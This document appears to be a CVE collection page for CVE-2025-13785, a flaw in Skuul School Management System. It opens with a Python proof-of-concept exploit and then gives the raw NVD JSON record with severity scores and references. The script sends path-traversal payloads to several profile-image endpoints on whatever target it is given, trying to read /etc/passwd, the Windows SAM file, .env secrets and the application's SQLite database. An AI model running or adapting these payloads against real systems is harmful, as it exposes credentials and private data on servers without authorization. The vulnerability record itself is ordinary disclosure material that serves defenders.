CVE-2025-13785

import requests import sys # CVE-2025-13785 PoC - Information Disclosure in Skuul School Management System # Target: /user/profile Image Handler component def exploit_cve_2025_13785(target_url): """ Exploit for CVE-2025-13785: Information Disclosure in Skuul School Management System The vulnerability exists in the Image Handler component at /user/profile """ # Target endpoint for profile image handler endpoints = [ "/user/profile", "/user/profile/avatar", "/api/user/profile/image", "/storage/profile-images" ] # Malicious payloads to test for path traversal and information disclosure payloads = [ "../../../../etc/passwd", "../../../../../../etc/passwd", "..\\..\\..\\..\\windows\\system32\\config\\sam", "../../../../var/www/html/.env", "../../../../storage/database.sqlite" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-13785 - Skuul School Management System Information Disclosure") for endpoint in endpoints: for payload in payloads: try: # Test for path traversal in image handler url = target_url.rstrip('/') + endpoint params = {'image': payload, 'file': payload} response = requests.get(url, params=params, timeout=10) if response.status_code == 200: # Check if sensitive data was leaked if 'root:' in response.text or '[' in response.text: print(f"[!] VULNERABLE! Endpoint: {endpoint}") print(f"[!] Payload: {payload}") print(f"[!] Response length: {len(response.text)}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("[*] Testing complete. No obvious vulnerability detected.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13785.py <target_url>") print("Example: python cve-2025-13785.py http://target.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_13785(target)

{"cve": {"id": "CVE-2025-13785", "sourceIdentifier": "[email protected]", "published": "2025-11-30T08:15:45.403", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in yungifez Skuul School Management System up to 2.6.5. This issue affects some unknown processing of the file /user/profile of the component Image Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yungifez:skuul:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.5", "matchCriteriaId": "9993017D-E25A-4959-91D8-4A37A6B6A03B"}]}]}], "references": [{"url": "https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333789", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333789", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.689026", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://gist.github.com/thezeekhan/02f5255506080849fc732eea07008634", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?submit.689026", "source": "134c704f-9b21-4f ... (truncated)